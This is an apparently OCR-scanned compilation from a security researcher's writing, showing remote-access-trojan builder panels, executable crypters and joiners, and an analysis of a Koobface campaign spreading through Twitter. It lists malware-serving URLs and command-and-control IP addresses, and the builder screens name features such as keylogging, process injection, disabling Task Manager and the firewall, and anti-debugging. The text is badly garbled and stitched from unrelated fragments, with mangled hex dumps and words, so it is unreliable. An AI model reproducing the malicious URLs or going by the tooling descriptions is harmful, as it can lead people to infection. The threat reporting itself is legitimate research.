0x0010 0000 0000 0000 4000 1400 0000 
0x0020 0000 0000 0000 0000 o000 O000 
0x0030 0000 0000 0000 0000 0000 0001 
0x0040 OOOE 1FB4 O9CD 21B8 014C Cb2Z1 an 
Oxo0050 6973 2070 726F 6772 616D ZO06D This program mus 
Ox0060 6265 2072 7S6E 2078S 6E64 65872 t be run under WJ 


0x0070 3332 ODOA 2437 0000 0000 0000 in3Z.. 
0x0080 o000 0000 0000 0000 0000 0000 
Ox0090 0000 0000 0000 0000 0000 O000 
0x0040 0000 0000 0000 0000 0000 O000 
0x00B0 0000 0000 0000 0000 o000 0000 
Ox00co 0000 0000 0000 0000 o000 0000 


Position: oooo00 File: E:\Documents and Settings|amimn|Skrivbord\Projects\TestApp.exe 7 
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Disponible | Emplacement 


(2) MSVBVM60.DLL C:\WINDOWS\system32\ 
(9) ¥BA6.DLL ? 


(3) MSVBVM60, DLL C:\WINDOWS\system32\ 
5) YB6.OLB ? 


For The Stub 
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P| © Syn Downloader M.I 


Url: ttp://SynSecurity,Com/Server,.exe 


File Path ; 


Babu Injection. BdProcess Name. 
DLL Name : 


Process Name : 


BadlHide Process. 
— 
Process Name: [Eprints 


| About | Create _| 
Status ; Waiting Instruction... 
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3 x Backdoor xi 


Konsola help 
Po aczenie 
[localhost 7] [47221 7] 
T Podmieniaj nagéwki 
[ Zo aszaj serwer % 3 
T Zrealzuj po? aczenie 


[ Wy'cz monitor [ Unuchom combo 

[ Wy'cz wygaszacz [ Blokada attectredel 

[- Uktyj pasek stanu [ Wysufi lokaing ed } 

. Ukny ikory [~ Uktyj kursor myszy 
[ Zrmiana pizyciskow 


Zdalna praca 


zdaina praca send 


Wytcz 


Connected to 4 } 


cdrom open | cose | Print text on = * Gat 
| monitor on | off | —— yourmic: — [haster | Chat on 
startbut. hide | show , ; HOC thevnitc [Save SO | gas 
taskbar bide | show if red , ; 
desktop hide | show | ¢ 


Save; 6 OC 


Master: Wel belo Sure HOC | 


mouse trats|off — 


crazy mouse on off | 
wert mouse bor's _on | off | 
Gable keybowrd  Gsable | enable | 
flash keyboard lights start | stop | 


deck hide 


change | undo 


Sif, 0 Conmectio awa = HOC VLD ~ ~~~ 


Fae Distnbete Setongs Debug Help 
q 


F | User Name 


| WAN - IP | Remote Connection Tine Regonsl kformabon 


MOC v1.0 is now istening for con 


Ratus: Disconnected - Connected Serv 
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straitcashhomie: My home video :) http://zoomtox.com/youtube/ 
about 2 hours ago from web - Reply - View Tweet 


mexicanhobo: My home video :) http://zoomtox.com/youtube/ 
about 2 hours ago from web - Reply - View Tweet 


eventingemi: My home video :) http://zoomtox.com/youtube/ 
about 2 hours ago from web - Reply - View Tweet 


nibor247: My home video :) http://zoomtox.com/youtube/ 


about 2 hours ago from web - Reply - View Tweet 


shimmeringtears: My home video :) http-//zoomtox.com/youtube/ 


about 2 hours ago from web - Reply - View Tweet 


StrngrOnEarth: My home video :) http-//zoomtox.com/youtube/ 
about 2 hours ago from web - Reply - View Tweet 


My "[1]fan club" is at it again - abusing Web 2.0 in an automated fashion. A new Koobface 
variant, modified by a [2]Cyrillic-aware cybercriminal going under the handle of "[3]floppy" - 
it has also been injected within legitimate sites - has started [4]using Twitter as a distribution 
channel for the group as of last week. 


Hundreds of users infected with Koobface and using Twitter, are now automatically tweeting 
links to their followers in an attempt by the Koobface gang - evidence on my fan club’s involve- 
ment keeps popping up like mushrooms - to abuse the much more insecure micro-blogging 
service in comparison with their original traffic acquisition Facebook, where they had to adapt 
and [5]outsource the CAPTCHA-solving process. 
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@-0 Bad AKx*eB — nox 


authentiun 5.1.0.4 2008.07.25 V32/nev-malware Maximus 
ores ex : ss 


[149] 


24153 
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OF cir_optimization_v2.0.5... 


Processes application compatibility cache... 


Provides support for 3rd party protocol ... 


Facilitates the running of interactive appl... 


Processes installation, removal, and enu... 


Manages audio devices for the Windows ... 


Provides protection against computer vir... 
The Base Filtering Engine (BFE) is a servi... 
Transfers files in the background using id... 
Maintains an updated list of computers o... 


Propagates certificates from smart cards. 
Microsoft .NET Framework NGEN 

(null) 

Manages the configuration and tracking ... 


Provides four management services: Cat... 
The Offiine Files service performs mainte... 
Provides launch functionality for DCOM s... 
Registers and updates IP addresses and... 
The DNS Client service (dnscache) cache... 
This service performs IEEE 802. 1X authe... 


Provides fingerprint authentication of ac... 
The Diagnostic Policy Service enables pr... 
The Extensible Authentication Protocol (... 
Provides support for improving system p... 


This service manages events and event... 
Supports System Event Notification Servi... 


Enables you to send and receive faxes, ... 
Host process for Function Discovery pro... 


Publishes this computer and resources at... 


Optimizes performance of Windows Pres... 


[151] 


NT Authority Lo... 
LocalSystem 


file fot Yew History Bookmarks 


Tools Help 


e - SM BD ottpy227.0.0.1:82 2d source 


45:55:34] Computer localhost” at “127.0.0.1" 
Requested: ~ Using Method: "GET 

35-55: 38 | Competer localhost” af 527.0.0.1" 
Requested: TYavicon.ico” Using Method: "GET 
35:55: 32 | Computer Tocalhost™ a “127.0.0.1" 
Requested: ~ Using Method: “GET 

35°55 : 33 | Computer Vocathost™ at “127.0.0.1" 
Requested: ~ Using Method: "GET 

35°55 : 33 | Compester Vocalhost™ at “$27.0.0.1" 
Requested: ~ Using Method: "GET 

35 <55 : 33 | Composter Vocalhost™ af “127.9.0.1" 
Requested: ~ Using Method: "GET 

15: 55 ; 48 | Computer localhost” at “127.0.0.1" 
Requested: ~ Using Method: “GET 

35°56: 35 | Computer Tocalhost™ at “127.0.0.1- 
Requested: ~ Using Method: “GET 

45°56: 35 | Competter Vocalhost™ at “127.0.0.1" 
Requested: Tavicon.ico” Using Method: “GET 
35:56: 18 | Compester “localhost” af "327.0,0.1" 
Requested: TYavicon.ico” Using Method: “GET 
35:57: 10 | Computer localhost” at “127.0.0.1" 
Requested: ~ Using Method: “GET 
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Accept Encoding: gzip, deflate 
Accept Charset: ISO. 8859.1 utf-i 
Keep-Alive 300 

Connection: heep-aliwe 


GET favicon sco HTTP) 3.4 

Host: 327.0.0.5:82 

User Agent Mozilla $.¢ Windo 
Accept tert ttm! applicateon «tr 
Accept-Language emus.ernoq*0 
Accept-Encoding: gzip, deflate 
Accept-Charset: ISO-8859-3 utf-i 
Keep-Alive 308 

Conmedion: eep-alive 


GET d= source MTP 11 

Most 127.0.0.1:82 

User-Agent Mozilla ’$.0 (Window 
Accept text ttm! application ‘er 
Accept-Language en-us enoq=0 
Accept-Encoding: gzip deflate 
Accept Charset: ISO-8859- 1 uth! 
Keep-Alive: 300 

Connection: beep ale 

Cache Controt manages 0 
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[153] 
24156 


[161] 


24162 


The Twitter campaign is different in the sense that the Koobface serving URLs generate 
random strings in an attempt to defeat [6]generic detection which is still possible due to the 
[7]template-ization of malware serving sites. 


The Koobface serving links themselves are a combination of purely malicious and com- 
promised legitimate web sites, serving a slightly modified fake YouTube page, and using 
a well known - maintained by the fan club - [8]command and control/redirector domains 
(119.110.107 .137/redirectsoft/go/tw.php; 61.235.117 .71/redirectsoft/go/tw.php) found in 
their previous campaigns. This particular campaign provided factual evidence on the direct 
connection between the group and several [9] Twitter, LinkedIn and Scribd malware campaigns, 
where scareware and Koobface variants were served. 


The following is a complete list of the Koobface URLs used in the Twitter campaign: 
64.37.106 .170/myfilm/ 

66.206.9 .169/privateaction/index.php 
asachi.evolink .ro/bestdvd/ 

aspompierul.zzl .org/freeperformans/ 
aspompierul.zzl .org/publicclips/ 

bit.ly/ w4ITQ 

bodegasjalisco .com/bestfilms/ 

brentsmusic .com/publicaction/ 
cadcam.tecnoceram .it/privatedvd/ 
carolslinks .com/fantastictube/ 
caruso89.netsons .org/bestaction/ 
celaneotest.fun-domain .com/uncensoredvids/ 
chaps.com .my/besttube/ 

chriscubed .com/cooldemonstration/ 
costafarilya .com/extrimetv/ 

cubman32.net .ua/extrimevids/ 

dalaa3.110mb .com/extrimeaction/ 
deathschildren .com/extrimeclips/ 
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= Lico 
6 120ulkudesignbygolot23te4. gif 
= AdobeDebug. txt 
(BAeroSuite_2102962222008. zip 
(7) AKAN_283.exe 
(GpaArabian-Attacker.rar 
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InstalltionPath 

@ System32 © Visible 

© Windows © Normal 

© Program Files © Agressive 

© Temp [_] AutoInstall Persistence (developing) 
© Custom {C;\windows\ © Autoinstall ZLib 


InstallationOptions Other 
Exename: 
set older Date [Testexe 
[") Set Attributes Hidden (©) Multi Instance 
Set Attributes System [_]Generate every startup a new .exe Name 
[try to Write in ADS(de ing) [_]Generate every startup a new extention 
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System 
System 
System 
System 
System 


C:\Windows\system32\conim... 
C:\Program Files \Sony \Wirele... 
C:\Program Files\Sony\VAIO ... 


System 


:\Program Files\Windows Me... 


System 


Mics 
+\Users\Aydin Downloads 
= Files\Microsoft Vis... 
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Status 
lr 


[lAwoserwonCan | Caples] [| Check 7th. | 
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1G 127.00.1 [Aydin@AYDI 


TELE 


PEE EEELLEELEEE 
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Description 


Iblis succesfully loaded 
Wekome: Aydin 
Winsock listening on Port {ii 


divya.com .au/megatube/ 
download.rmes .ru/uncensoredclip/ 
dplive.webserwer .pl/besttv/ 
dramat.ilive .ro/extrimeclips/ 


Video posted by -WizArD- 


Adobe Flach Cayer Updete 


Nes content oequires Adobe Flach 
Haryeer W037, Weukd you lke ve meena 


Video Responses: 10 Text Comments: 70 


babachat (4 hours ago) 
Funniest thing EVER!! 


filipicsr .biz/youtube/ 

flaviusrize .com/uncensoredclips/index.php 
gandhiinternational. in/extrimetv/ 
igorbrasil .com/freetv/ 

itprospecialists .com/cooldvd/ 
kawalkimp3.yoyo .pl/yourtv/ 
kuzmi4.110mb .com/yourshow/index.php 
lemujeme .cz/myshow/ 

lepk.yoyo .pl/privatevids/ 

matt.freehost .pl/privatefilms/ 
nataly.org .ua/extrimedemonstration/ 
oceanacompany .com/bestvids/ 
oceanacompany .com/yourshow/ 
piuk-chow .dk/megafilms/ 

promo-door .ru/mymovie/ 

reprographic .co.in/fantasticaction/ 
reprographic .co.in/megaperformans/ 
rksrouby .cz/funnyaction/ 
sekurpaslanmaz .com/amaizingdvd/ 
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[182] 


[x] Error while initializing the driver ! 
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File Manager 


Used Space : (26823732 Ko ) 
— 


Fes : 22 Ow = 15 


Name IP Post Value 


f Buttons ) SMe = 127001 51234 195717 C71 © Computer Name SERVER/Administrateur 

p)cru AMD Athlon{tm) XP 2600+ 

a Windows Dir C\WINDOWS 
System Dr CAWINDOWS \syttem32 
Tine Active Od 2h Sm 

= OS Windows XP Service Pack 2 

‘J Secunty 

©] Language Fraerpais (Fiance) 

_J Number O! Mouse Butters 3 

“BScieen Reskson 120041024 

 Wandows Sens enterica pram 
Mac Ackess aggro 

2 Curent SID sa AANA a PLE, 

Cherk Pot: (15432) SIN Pet: [51234 [ STOPiListening | | G@SendBex Yes 


Process Manager 


Process Path PRD 3 iy 
—) AGOFG.ece C:\Prograen Fles|>-ink\ AirPlus Gl 3 048 ~ taean Fl ALLE 
(7) ApplieMobleDeviceService ence C:\Program Fles\Fichiers communs\Apple\Moble Device... 3 22 ‘ 
~) bdagent exe C:\Program Fles|£tDefender|£RDefender 20081, 9 22% 
=) 2 


C:\Documents and Settings\Adminstrateur|BureaulSyn... 


Be deity roo am F 


5 ‘ae C:4Progeaen FL — Ust Process Files 

7) Explorer EXE CHWINDOWS lai List Selected Process Modules 
CO) Hezipent 2.en6 CAWINDOWS 96 a cotected Process 
ae ain - 


Glear Process List 
Gear Modules List 


Process Moddes Module Path 
CA\WINDOWSI 


Rat 2.0 - Z\Cherk} 
-Corkroks_659Sb641 44ccf1dF_6... 
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> PFE 0.2 US? - Protector For Executable 


Files Options Plugins PFE Options About 


= P.F.E 


Protector For Executable 


Joiner Option 

File Protecting 
Packer Options 
Message Alert 


External plugin 


Orders 


Icon | Build 
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PFE 0.2 US? - Protector For Executable 
Files Options Plugins PFE Options About 


ilaiinaliasn C:\Documents and Settings '|H-Spyter\Mes | | 


Package Infos 
Joiner Option PfeC (Config Infos) Informations 
File Protecting Date SP : 27/09/2008 07:14:58 


Packer Options Coder: VMP - vymp@pfe-project.net 


Message Alert Version: Version 0.0.3 


External plugin Licence: VALID 


Orders Comment: <Ho Comment> 


0 About 
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34 Abdelhamid 


32251) 


i 
rerken 


& [b¥{c=5)Miz02 [/c]f/b) (H) 7 
& [c=1][a=1][/aNicNc14][a=14]|[/aN/clc=tYa=1)|alic] [c=1}C?72? [ic]..}  [cm4 a= t4] [c= 1 Drv? 7LfcILallic] «| 
Dy [e=1Ma=t]iaNeNe=14]le=14] (al felc=te=t) elie) (o=1 272? [ie]..} [c= 4 amid) [c= 1 )Oev7L/eIalle) (F 
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ME) binder 
Cybrg Crew | 
% controls.ocx 2 


Activex-besturingselement 
Mel 0 KB 


me) Stub 
Commandbars.ocx 
Activex-besturingselement 
2.062 kB 
installocx 

gy MS-DOS-batchbestand 
1 kB 


Patch Server 
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Files Manager 


Files ‘Folders 


<AdobeHelpData> 
<Browser> 
<Required> 
<Resources> 
AdobeUpdater.dill 
agidt2é81.dll 
ahe.exe 
ahcremind.exe 
AXE8SharedExpat.dil 
AXSLE.dil 

BIB. 
ermmsg.sys 
errmsg.txt 
iaccore.dll 
install.adb 
libaglit8n28.dil 
libagluc28.dil 
mever71.dil 
OperaMgr.dll 


Files has been Downloaded !"! 


Gowiond [_Upbod J_Daee Fin]. Fase | 
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Key Logger 
Online KeyLogs Olfigne Keylogs 


24177 


Show 
Hide 


Start Listening 
Create Server 
Creat Downloader 


Open Floders Data Floder 
Download Floder 
Images Floder 


[193] veau dossier (2) 
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| Debugger Exception Notification 


[x] Project SIN.exe raised exception class EPNGInvalidFileHeader with message ". Process stopped. Use Step or Run to 
continue. 


I~ View CPU Window 
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° Pet Tee Strg 
127.001 nm naz 


C Rac eerts and Settings Aceeesy ten BrewASyn Rae 20 > HO) 
CMIDOWR WSF _Picresctt. Windows. Cormmon-Contrcls WIE RtA Leet it 6. 
COW Ry meme IT) 
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Buer i700 


“20st SO 
Chert Pot: [15432] St Pent [51234] (PF STOP atoning) | GBSanctox 
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Widows P Service Pack 2 


Frances France| 

3 

12801004 

PRD OP TIWOR HOD ASOT 
(SF ROL 

SVG AVIS 1 OGIINET-6. 


127.001 


Peay VB Sect 


+ VEIAGH Te Melo Virus By OA, 


€ (drtee Sewvelypentice(dwe, Orivelype=3) then 
wan wedeal oidervidive Pathet) 


frourenseysey (ites) (Saeed 


[198] 


Gtre: te psral fasdt ot de cdot 
Sovveparder det hcheers ef det itomeret 
Peevtnset Gen fcheers of des stpertones 
Mosier howe tpetires 

Ardler be sytew 

Force Fant b pat dun ontine Gta 
Prendre potsermon des fichuers ou d edees cyets 
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Service Name ; 
Service Display Name ; 
Install Path : 


Invulnerabilty Methode ( Considered As A Worm Infection ) 


[Disable TaskManager [[ |Disable RegEdt [| Disable xP Firewall ("| Forbid Msconfig [| Forbid CMD 


Connexion Setting’s Fake Error Message 


aaa) a ame alam 


Message Icon 
None | | 
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sekurpaslanmaz .com/bestfilms/ 

siam9 .com/bestfilms/ 

siam9 .com/coolclip/ 

siam9 .com/publicmovies/ 
skywebupload.freeweb7 .com/funnyclips/ 
srbijafest .org/privatefilm/ 
subject.freehost .pl/extrimefilms/ 
subject.freehost .pl/publicvids/ 
supreeme .com/megademonstration/ 
teatrall.dramat.ilive .ro/extrimeclips/ 


text/html 


text/html 


ation} 
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cy 
Un petit bonjour'a un petti ami 
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| 


Un petit bonjour'a un petti ami 
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fey PFE CX GUI 0.1 - www.pfe-project.net 


Input , pAddional Options 
Open '¥] Compress Ressource(s) 

"|_| [_] Compress Icon(s) 

PFE CX Compressing~ — iv] Anti-Debugger/Crack 
[| PFE CX Virus Detection 
e 
Li U2 is Os Os Us Li? Us Us |v] Crypt Executable 
Type : | PFE CX Runtime & (middle) | Best nal | |Strip relocations 
= ‘| | (_JUse external PFE Cx 

(¥| Best compression for supect files [| Backup < : 


Bind Informations 


|PFE CX GUI 1.0 - Coded by MP 
Offical Web Site : http: /Avywyeywe pte-project.net 


http: JAvwyy pte-project net :: Protector For Executable :: 


24184 
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> PFE 0.2 US? - Protector For Executable 


Files Options Plugins PFE Options About 


Execs PFE 


vomeroone_| Protector For Executable 


File Protecting 
Packer Options 
Message Alert 
External plugin 


Orders 


Icon | Build 
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fey PFE CX GUI 0.1 - www.pfe-project.net 


Input Addional Options 
Open [¥| Compress Ressource(s) 
[_|Compress Icon(s) 

PFE CX Compressing iv] Anti-Debugger/Crack 
|_| PFE CX Virus Detection 


[¥| Crypt Executable 
Type: |PFE CX Runtime & (middle) | | Best > _| Strip relocations 


|Use external PFE CX 


1 l2 f@l3 Lj4 C5 Le |? 8 9 


(¥| Best compression for supect files [| Backup 


Bind Informations 


PFE CX GUI 1.0 - Coded by MP 
Offical Web Site : http: /wywyw pfe-project.net 


http: Aww pfe-project net :: Protector For Executable :: 
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cv F:\PFE\PFE CX 0.1\pfecx.exe 


This file is compressed, crypted + 


and protected ! 


File : F:\PFEN\PFE CX 6@.1\Game_Z3211.exe 
Before Size : +—-861 KB 
Size : +-468 KB 
and Compress with PFE CX Runtime 
. Best (Default Compression? 
Please wait PFE Cx is crypting and compressing... 


Compressing OK ¢ 
Crypting with PFE CX Runtime... 


Fee age io PEE CX Runtine..- Final Package : +- 408 ko 


Game_Z3211.exe patched ? 
Thank you for your using ¢ 


. 5 q 
e: | Game _23211.exePFE_PATCHED 


http: //www.pfe-project.net For use PFE CX, drag your file on it... 
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ofl PFE Joiner - 3 files to join ! 


| Name Size 

_ > PFE-0.1(Beta.... 1.067 KB 
| GRPFE-0.1(Beta... 914 KB 

| »]fond.bmp 175 KB 


Start Memory Extension Delimiter 
Yes .exe BTmgEiGhi... 
Ho zip KxhgwiWP... 
Ho -bmp uMLNigDC... 
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PFE 0.1 (Beta Version) - Protector For Executable 
File Options Plugins Pro Options About 


General Setting 


Pack Setting 


Joiner Options 


Packer Options 
File Protecting 


Alerte Message 


External Plugins 


Command + 


i 


Filename 
G:PFEW.1'PF... 
G:\PFEW.1'PF... | 
G:\PFE‘0.1'Im... 


FEI @| = 


Type: Critical 


Title: 
|PFE Information 


Message: 
|Application has lunched succefully ! 


Icon | Build 
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443A2GRK1E =8A9 
269@D93C55 -=561 
4235AES616 :896 
57@DBAG360 -:'788 
381GED5@12 :8k8 
4CG1677733 -=479 
BC39A49B6C :5668 
GG098G9RGG -44B 
GEEG@BD265C -EGS 
?D48D714E2 =DAA 


et ak at Dd Pt ek et et et 
Seeerrrrrcr]- 


6C: 
Ag: 
62: 
3A: 
E6: 
54: 
9C: 
15: 
DG: 
29: 


Add PFE CX RUNTIME... 


c: ADOCuDEIES and Settings\H-Spyter\Bureau\PFE-CX-0.2_BETA-TES 


@0B7B8 74040D71C3BO5 DD9 DOA 7KEG69 GUBDGDE100C1241668C 
DCGB1 93 7GE4GA2 461 G35 ED2XXGBA7865 74448 D568 9CDAG3 30% 
88 BOGES BRX3CG485 DXB31CG1XGG5AG2BGED34B2G6E25 761619 
6865AG1 D866 285 GEDBG6 42 DD DCO7BG3 762 BBA6% 3 D42877144 
XAXCG71XBSBAGAGBCE DBX C26 7866843761 EGEGED1 G3GGAE36CG 
A7A283 BB 985% 7D999RGAB4AGA 4AGE BA GDB 2 GAGBDEGACS 723 7D 
DEGACE728E1D66226964NG3 966886665 36163 BUBCEB7BGE4860 
90814696 EG@DG5649 722DC61662A998383B36 711A 77126988 
36 DBC6365 B3 686% E6178 G63 EGCG3 ECOGA 72 666063 9E748 E488 
336 76B5 GEGCEBGE4G1 ABBBHGX6 4DCH6 8AG3CHG163A3B468 ECR 


Extracting CX ressource...OK ¢ 


Compressing File...0 
Changing CK file.. 
Crypt PFE Header...0 
Add PFE $ ignature . eae 
Pceamcis line CX resso 


Writing CX ressource.. 


Building...OK ¢ 


K ¢ 


-OK ?¢ 


K ? 
OK ?¢ 


urce.. 


-9 


-OK ¢ 
K ¢ 


Your file has been patched *¢ 


Thank you for your us 


ing 


Please visit www.pfe-—project.net 
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WW Syn Crypter [ Private ] x 
C:\Documents and Settings\Administrateur\Bureau\S || <,,> 
2 Crypt 
File Size ; 1599488 Bytes 
< Analysing... > 
< Crypting... > 
< Updating... > 
< File SucessFull Crypted By SynCrypter Coded By be 
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vu IMVU Messenger a 


Buddies Settings Help 


Inventory 


> Buddies (0/0) 


v Buddy requests (0/1) 


a = a = : heme 


v Recent chats (0/3) 


is ’ i 
' te 


DAILY, OUTFIT) | = 
CHALLENGE)! 
, ane y 


oan ave 4 
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jB PFE CX 15.11 | Private ¥ersion | www.pfe-project.net 


Input ;Addional Options 

| Open |v] Compress Ressource(s) 
————" |_| [_] Compress Icon(s) 

PFE CX Compressing iv) Anti-Debugger/Crack 


| |PFE CX Virus Detection 
° 
Li U2 @s U4 Os Us U7 Us Us '¥) Crypt Executable 


Type : PFE CX Runtime A (middle) oa ‘Rapid 5 (_}Strip relocations 


— ——> | |Key for cryptage : 
Best compression for supect files [| Backup | sAntanansansnnans thts 
Bind Informations- 
PFE CX 15.11 - Private Version | Start | 
(Offical Veb Site : http: JAvwyy pte-project net —————_—_ 
\Updates until 3142/08 on ww pfe-project.net with your PFE account ‘= 


:| Protector For Executable :: Updates until 3142/08 on http: /Avyeyw pte-project.net 
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s = 
[3 Services Manager = aene > ‘Port ‘Teme Sure | formation Type ‘vale in teen 
(Remote Shot © Computes Name SERVER Mhedmerestatens 
GB Poe Manage hou AMD Atttonten} xP 36006 ws DY i &d 
7 Gath Seiet , <a Wedena Oe CAwNDOWS 
+ bp System Oe CAWINDOWS \apstemd? Tele = 
dD Conmasieaion Tee ctw O4 That — 
§ Sy Mersage Manager a OS Windows ®P Service Pack 2 
Netretk Functons ) Seouaty Message 
1? MSN Manager =] rq Frargas Fuance| Controied By Syn Rat 
| tomes Neate OF Mowe Batons: 2 Author : DarkCodersc 
2 @ Mec Furctens ‘B Scoven Resotton 12ea104 
GQ Pret Manager Werdawes Semel rr 
4 Dp EGter 8 Optene o 1 Mac Ader: 
Edt Server = “Atuet$O 
we Cvs Optere — Glert Pot: (15432 SINPot: S124 WF STOP Latering 1s atex tue Oi > id 


[ 
[ 


H 
i 
i 
? 
i 
E 


A) Rewovetie Corte Me Poker (Change Home Page : 
tA feed wenn Vokjer Hetp lNaooge FrJ pat Set 
a Fued Oerhes Folder 
we, wR _j Cecurents and Settings Pokter Remote Download Mle : 
FA «ROM corre Fookder 
= Phe ut: [tSyrSacuty Neti Server, 
el cao LuMetaptapr Poker < —- — 
oH «ROM AMS ache Fokier Phe Srotaled Path : CilWindows\Server exe 
Ll My Web Stes Fokier ¢ = 
Total Och Space | <a frogam Ries Fekter mtotmote: Eline [rae 
Type See \Veke [= uP rthenss Folder 
Byte ieee oe Fokter Ditrorbe On Regary 
FacOye: = 117200008 (ynecrar Fokier = Reg Key Name : 
MegaByte:  114463.09 ~ Semung Fokder 
Gigubye: 478  cysman ee Onchay Name Servee Nowe 
TeaBye: = O11 Q fececttcermert, Aherter Repped 
a i) ~via WOOGIE AES ord Service Gola passarcie de te couche Ap... 8G Rated 
Free Space (7O2002K0) | MEWICSd Servic AEWDCSStervice ‘Rogped 
a _ System Vohsee Information Fokier Fogle Mobile Oeics Fete Moble Device ‘Seeped 
—dats Roauen Aeouchatserver chopped 
Used Space: (spogtese ine) | _awanmorwes Fekser ‘dees 
| ew = ae fasdo Wedows faster Rated 
Service de tranclert rteliget en avitre... Rated 
Phos : 2% Desa O0%d_ reg LOWPIO 128 _4229_D... Server heeped 
hated 
Repped 
Repped 
‘tepped 
Rated 
ated 
Rated 
Repped 
Data 
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£ Rub3 ¥3.0 Private - Joiner /Packer/Protector 


Pawwars VEaeIen 2008 Peorser vOUb TeeLS.. 


FileN ame Size Extension Run 
S| C!WINDOWS izlib.dil 364 KB dll No 
| C|WINDOWS'RICHTX32.0... 106 KB -OCX No 

<2 C: WINDOWS '\winhelp.exe 250 KB exe No 
| C WINDOWS 'Unit2-K.dll 241 KB <adlll No 
®) C!WINDOWS \clock.avi 81KB avi No 


“> CAWINDOWS'system.ini = 0KB Jini No 
= CWINDOWS'KB952287.log 15 KB log No 
“& C:WINDOWS'Game_WalL... 461KB exe 

¢f C:WINDOWS'\regedit.exe 149KB  .exe No 


ee 


__) aaa File... er Protect | an [ Cth 
> Remove | O Icones | R Build My Rub3 Pack... 
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A Rub3 Application Protect 
:: Encryption Files :: 
Class Encryption: Rub3 Encoder B v 
Password: |rub3-password-ZX? Generate 
Random: 85 


:: Flasher Files :: 
Flasher Level: 1 2 3 4 5 
Warning : this the max level! 


:: Private package :: 


v| Add Privates Datas in my package Generate 


1BD4IRXDNVVOKIOCSSIXE? XOSCXSN? Z4MUPRPOSSP254VV01 P 
NM2H427PIP3Z9ZT7OUA1 G2JN78KDYKS1 ISSEY 36KO0L1 GCE 
WSTSZ4DGS2NIBRBANYOGJBDRYRY T4US0H7 BS ZIUWWIRSE 

GVVABRVYD2M2UUV XQ? Z3U77 ZTJVKMTSRSMY SU4PRUJHUM 
CWESSCVWV2OROWSEY O37 IMAOVYWPOKOBY8O57 2028 ZB 


v| Create a log on error 


rub3errorpack.txt 


24190 


[214] 


& pub3 Settings 


:: Joiner Settings :: 


Installation : WINDOWS 

Dil Joiner [TTF]: MAC1.DLL [JOINER B] 

Joiner Metod: | RFDD-DERFF-78MLO 

Delimiter Key: = [#17/'#??22%* $U#RUB32@2] 
First Writting: 20 §(¥ octects 

V| Activate Anti Debugger 


v)| Activate Anti Cracking 


v| Activate Anti-Ressources 
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4] Rub3 EXE Informations 


Select a lcon for your package : 


¥> 


:: Load a private icon :: 
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& Rub3 Package Informations 


Extract TABLE.dll... OK 
Create EXECUTABLE... OK 
Add Datas... OK 

Delimiter : [#17/'22222%* $ U#RUB32@2] 
Metod : RFDD-DERFF-78MLO 
DLL : MAC1.DLL [JOINER B] 
INSTALLATION : WINDOWS 
File Name : zlib.dll 

Crypting Flashing... OK 

File was added! 

File Name : RICHTX32.0CX 
Crypting Flashing... OK 

File was added || 


File Name : winhelp.exe 
Cromtina Flachina OK 
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S72.231Mozilie/4.0 (compatible: MSIE 7.0: Windows BT 6.07 SLOCL: .MET CLR 2.0.807277 Media Center PC &.07 InfoPath.27 .MET CLR 3.5.30729: .MET CLK 3. 
62.367 (Mozilie/S.0 (Windows: Ur Windows BT $.i7 ES? rvil.9.0.55) Geoko/2O0HSE021S Firefon/3.0. ii inctpi//twitter.com/ 

©.i84.67|Mozillea/4.0 (compatible: MSIE 7.07 Windows BT 6.0: Mozilia/4.0 (compatible: MSIZ 6.0: Mingows BT §.i7 S¥i) : SLOCL: .MET CLR 2.0.807277 Media 
«S7.7i(Mozilla/4.0 (compatible: MSIE &.07 Windows BY 6.17 Trident/4.07 SLOC2: .MET CLR 2.0.807277 .MET CLR 3.5.30729: .MET CLR 3.0.30725) Media Center 
«57. 7i(Mozilia/4.0 (compatible: MSIE £.07 Windows MY 6.17 Trident/4.07 SLOC2: .MET CLR 2.0.807277 .MET CLR 3.5.30729: .MET CLR 3.0.307297 Media Center 
26.2231 210/4.0 (compatab: MSIZ 6.07 Mindows BT 5. S¥i) (mctpi// twitter. com/OrDorchester/staveses/2 344938435 

26.223) 3ia/4.0 (compatible: MSIZ 6.07 Mingows BT $.i7 SVi) (nttpi//twitter.com/Orborctester/statveses/2 344930435 

48. 31Mozilla/S.0 (Windows: Ur Mingows BT $.i7 en-US: rvii.&.1.14) Geoko/20080404 Firefou/2.0.0.i4(nttpi//tinyurl.com/magnas 

«39.26(Mozilie/S.0 (compatible: Twitturle: ¢Rttpi//twitturls.com) Ihttpi//twitterlis.com/ 

Si. iSS(Mozilie/4.0 (compatiblesMSIZ &.017 Windows -NT $.0 - real-url.org) imttpi//real-erl.org 

«34. 134)Mozilla/4.0 (compatible: MSIE 7.07 Mingows BY §&.1) imctpi//twitter.com/DecPiato 

«29.26)Mozilia/S.0 (compatable: Twittarle: eRttpi//twitterls.com) INttpI//twitteris.com/ 

24i.21Mozille/4.0 (compatible: MSIZ 6.07 Windows BY $.i7 SVir .MET CLR i.5.4322) Inttpi//twitter.com/therealtneong/statuses/ 2326936716 

223.97 |Mowalia/S.0 (Mitr Or Linum 16867 en-US: rvii.9.0.45) Geoko/200H060308 Countu/9.04 (jaunty) Firefou/3.0.iiinctpi//twitter.com/ 
«i9.261Mozilie/S.0 (compatible: Twitturle: «httpi//twitturls.com) Inttpi//twitturis.ccom/ 

«223.941 Mozilie/4.0 (compatible: MSIZ 7.07 Mingows BT $.i7 .MET CLR i.3.43227 .MET CLR 2.0.80727: .MET CLR 3.0.04506.30) Inttpi//twitter.com/ 

«223.941 Mozille/4.0 (compatible: MSIZ 7.07 Mingows BT $.i7 .MET CLR 2.3.43227 .MET CLR 2.0.807277 .MET CLR 3.0.045806.30) Inttpi//twitter.com/home 


tenminutemedia .com/funnyclip/ 
thegoodhand .com/yourmovie/ 
thelambda.php5 .cz/privatemovies/ 
tinyurl .com/I4809v 

webxtreme.evolink .ro/uncensoredtube/ 
wiedzmin0O6.lua .pI/myvids/ 
xpertfill.com .mx/megafilm/ 

yarentextil .com/funnyvideo/ 
yasarturu.com .tr/yourvideo/ 

zoomtox .com/youtube/ 
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Create new server 


Connection instal settings 
In 
DNS /P (Max. 20 Address): retell neme: 
010101010101 (o) [rin32.exe 
Directory name: 
Password: Address list Seve 
010101010101 
© Program files 
O Widow's fokier 
@ System fokier 
Hide settings 
[7] Hicie file 
[¥] Change create date 
[] Met server 
Startup methods 
Key neene: 
O Activex StartUp — (1 TOWVL?-EOUS-LIF84-TBOS-HTS3KMK1EMTG} ) 
‘ S 
OKCUIn @ Both methods © Don't StartUp 
[221] 


Several 
Hide PID from Ctri+AR+Del 


Persist 
[¥] Active keylogger at startup 
Exclude [BACK SPACE] logs 


[C] Try inject into this process 
